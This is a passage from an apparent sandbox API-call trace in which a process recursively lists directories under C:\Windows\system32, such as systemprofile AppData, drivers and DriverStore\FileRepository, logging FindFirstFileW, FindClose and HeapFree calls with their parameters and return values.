ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x524ab327, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x4c005c, cFileName=".", cAlternateFileName="")) returned 0x70fd48 [0030.818] FindClose (in: hFindFile=0x70fd48 | out: hFindFile=0x70fd48) returned 1 [0030.818] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70faf0 | out: hHeap=0x6d0000) returned 1 [0030.818] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*", lpFindFileData=0x70faf0 | out: lpFindFileData=0x70faf0*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x524ab327, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x524ab327, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x524ab327, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x4c005c, cFileName=".", cAlternateFileName="")) returned 0x70fd48 [0030.818] FindClose (in: hFindFile=0x70fd48 | out: hFindFile=0x70fd48) returned 1 [0030.818] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70faf0 | out: hHeap=0x6d0000) returned 1 [0030.818] FindClose (in: hFindFile=0x70fab0 | out: hFindFile=0x70fab0) returned 1 [0030.818] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70f858 | out: hHeap=0x6d0000) returned 1 [0030.818] FindClose (in: hFindFile=0x70f818 | out: hFindFile=0x70f818) returned 1 [0030.819] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70f5c0 | out: hHeap=0x6d0000) returned 1 [0030.819] FindClose (in: hFindFile=0x70f580 | out: hFindFile=0x70f580) returned 1 [0030.819] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70f328 | out: hHeap=0x6d0000) returned 1 [0030.819] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\*", lpFindFileData=0x70f328 | out: lpFindFileData=0x70f328*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x24a30ea6, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a57006, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a57006, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x2a005c, cFileName=".", cAlternateFileName="")) returned 0x70f580 [0030.819] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x70f5c0 | out: lpFindFileData=0x70f5c0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x24a57006, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a57006, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a57006, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x52005c, cFileName=".", cAlternateFileName="")) returned 0x70f818 [0030.819] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Windows\\*", lpFindFileData=0x70f858 | out: lpFindFileData=0x70f858*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x24a57006, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24a57006, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24a57006, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fab0 [0030.820] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\*", lpFindFileData=0x70faf0 | out: lpFindFileData=0x70faf0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x24a57006, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x24aa32c7, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x24aa32c7, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x610074, dwReserved1=0x52005c, cFileName=".", cAlternateFileName="")) returned 0x70fd48 [0030.820] FindClose (in: hFindFile=0x70fd48 | out: hFindFile=0x70fd48) returned 1 [0030.821] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70faf0 | out: hHeap=0x6d0000) returned 1 [0030.821] FindClose (in: hFindFile=0x70fab0 | out: hFindFile=0x70fab0) returned 1 [0030.821] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70f858 | out: hHeap=0x6d0000) returned 1 [0030.821] FindClose (in: hFindFile=0x70f818 | out: hFindFile=0x70f818) returned 1 [0030.821] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70f5c0 | out: hHeap=0x6d0000) returned 1 [0030.821] FindClose (in: hFindFile=0x70f580 | out: hFindFile=0x70f580) returned 1 [0030.821] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70f328 | out: hHeap=0x6d0000) returned 1 [0030.821] FindClose (in: hFindFile=0x70f2e8 | out: hFindFile=0x70f2e8) returned 1 [0030.821] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70f090 | out: hHeap=0x6d0000) returned 1 [0030.821] FindClose (in: hFindFile=0x701c80 | out: hFindFile=0x701c80) returned 1 [0030.821] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70ee38 | out: hHeap=0x6d0000) returned 1 [0030.821] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\config\\TxR\\*", lpFindFileData=0x70ee38 | out: lpFindFileData=0x70ee38*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e088, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0xf1e088, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0xadb261cb, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6c, dwReserved1=0x78, cFileName=".", cAlternateFileName="")) returned 0x701c80 [0030.822] FindClose (in: hFindFile=0x701c80 | out: hFindFile=0x701c80) returned 1 [0030.822] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70ee38 | out: hHeap=0x6d0000) returned 1 [0030.822] FindClose (in: hFindFile=0x701c40 | out: hFindFile=0x701c40) returned 1 [0030.822] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70ebe0 | out: hHeap=0x6d0000) returned 1 [0030.822] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\cs-CZ\\*", lpFindFileData=0x70ebe0 | out: lpFindFileData=0x70ebe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e088, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x8cc4abd3, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x8cc4abd3, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x701c40 [0030.824] FindClose (in: hFindFile=0x701c40 | out: hFindFile=0x701c40) returned 1 [0030.825] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70ebe0 | out: hHeap=0x6d0000) returned 1 [0030.828] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\da-DK\\*", lpFindFileData=0x70ebe0 | out: lpFindFileData=0x70ebe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e088, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x8fab5928, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x8fab5928, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x701c40 [0030.831] FindClose (in: hFindFile=0x701c40 | out: hFindFile=0x701c40) returned 1 [0030.832] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70ebe0 | out: hHeap=0x6d0000) returned 1 [0030.832] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\de-DE\\*", lpFindFileData=0x70ebe0 | out: lpFindFileData=0x70ebe0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf1e088, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x2737b7c, ftLastAccessTime.dwHighDateTime=0x1ca0432, ftLastWriteTime.dwLowDateTime=0x2737b7c, ftLastWriteTime.dwHighDateTime=0x1ca0432, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x701c40 [0030.836] FindClose (in: hFindFile=0x701c40 | out: hFindFile=0x701c40) returned 1 [0030.837] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70ebe0 | out: hHeap=0x6d0000) returned 1 [0030.837] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\Dism\\*", lpFindFileData=0x70f3d0 | out: lpFindFileData=0x70f3d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf441e2, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x1e52f2f2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e52f2f2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x701c40 [0030.838] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\Dism\\en-US\\*", lpFindFileData=0x70f6d8 | out: lpFindFileData=0x70f6d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e52f2f2, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22a37f89, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e5555ab, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x701c80 [0030.840] FindClose (in: hFindFile=0x701c80 | out: hFindFile=0x701c80) returned 1 [0030.840] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70f6d8 | out: hHeap=0x6d0000) returned 1 [0030.840] FindClose (in: hFindFile=0x701c40 | out: hFindFile=0x701c40) returned 1 [0030.841] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70f3d0 | out: hHeap=0x6d0000) returned 1 [0030.841] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\drivers\\*", lpFindFileData=0x70f858 | out: lpFindFileData=0x70f858*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf441e2, ftCreationTime.dwHighDateTime=0x1ca0432, ftLastAccessTime.dwLowDateTime=0x1e9ce759, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9ce759, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x701c40 [0030.842] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\drivers\\en-US\\*", lpFindFileData=0x70fab0 | out: lpFindFileData=0x70fab0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e9ce759, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22952f33, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9f4a12, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x701c80 [0030.842] FindClose (in: hFindFile=0x701c80 | out: hFindFile=0x701c80) returned 1 [0030.842] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70fab0 | out: hHeap=0x6d0000) returned 1 [0030.843] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\drivers\\UMDF\\*", lpFindFileData=0x70fab0 | out: lpFindFileData=0x70fab0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e9ce759, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1e9ce759, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9ce759, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x701c80 [0030.843] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\drivers\\UMDF\\en-US\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1e9ce759, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22894196, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e9ce759, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.843] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.843] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.843] FindClose (in: hFindFile=0x701c80 | out: hFindFile=0x701c80) returned 1 [0030.843] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70fab0 | out: hHeap=0x6d0000) returned 1 [0030.843] FindClose (in: hFindFile=0x701c40 | out: hFindFile=0x701c40) returned 1 [0030.843] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70f858 | out: hHeap=0x6d0000) returned 1 [0030.843] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\*", lpFindFileData=0x70f858 | out: lpFindFileData=0x70f858*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfee8988a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x8421deb9, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x8421deb9, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x701c40 [0030.844] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\en-US\\*", lpFindFileData=0x70fab0 | out: lpFindFileData=0x70fab0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1dc3cf96, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x98858ddc, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x98858ddc, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x701c80 [0030.849] FindClose (in: hFindFile=0x701c80 | out: hFindFile=0x701c80) returned 1 [0030.849] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70fab0 | out: hHeap=0x6d0000) returned 1 [0030.850] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\*", lpFindFileData=0x70fab0 | out: lpFindFileData=0x70fab0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfee8988a, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x841f7c4a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x833f5788, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x701c80 [0030.853] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\1394.inf_amd64_neutral_0b11366838152a76\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x392f7a54, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3bdf6803, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3bdf6803, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.854] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.855] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.855] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\61883.inf_amd64_neutral_a64d66bac757464c\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3da54f2d, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x607ef4b0, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x607ef4b0, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.856] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.856] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.856] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\acpi.inf_amd64_neutral_aed2e7a487803437\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39b4c763, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x46150ef0, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x46150ef0, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.858] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.859] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.859] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\acpipmi.inf_amd64_neutral_256ad642985694b3\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x385b9fdb, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3bb22dde, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3bb22dde, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.859] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.859] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.859] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\adp94xx.inf_amd64_neutral_4928c8870f6a1577\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42198250, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61cc3556, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61cc3556, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.860] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.860] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.860] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\adpahci.inf_amd64_neutral_b082e95ec9f8c3f9\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x422307d1, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61cc3556, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61cc3556, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.860] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.860] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.860] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\adpu320.inf_amd64_neutral_4ea3d42a9839982a\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x422eeeb2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61ce96b6, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61ce96b6, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.861] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.861] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.861] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\af9035bda.inf_amd64_neutral_aa11aa34552d1d4d\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x474c2389, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x660e6b94, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x660e6b94, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.861] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.861] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.861] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\agp.inf_amd64_neutral_22cdceb61fbafb43\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4290871e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61e1a1b9, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61e1a1b9, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.862] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.862] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.862] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\amdsata.inf_amd64_neutral_67db50590108ebd9\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x395cb479, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3bedb045, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3bedb045, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.864] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.865] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.865] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\amdsbs.inf_amd64_neutral_5cae6933bef20aa8\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41eea98b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61ad4373, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61ad4373, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.865] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.865] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.865] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\angel264.inf_amd64_neutral_04b54b6322607cce\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4662dcae, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x65d087cc, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x65d087cc, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x70fd08 [0030.866] FindClose (in: hFindFile=0x70fd08 | out: hFindFile=0x70fd08) returned 1 [0030.866] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71bef8 | out: hHeap=0x6d0000) returned 1 [0030.866] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\angel64.inf_amd64_neutral_6bed16c93db1ccf3\\*", lpFindFileData=0x71bef8 | out: lpFindFileData=0x71bef8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x466ec390, 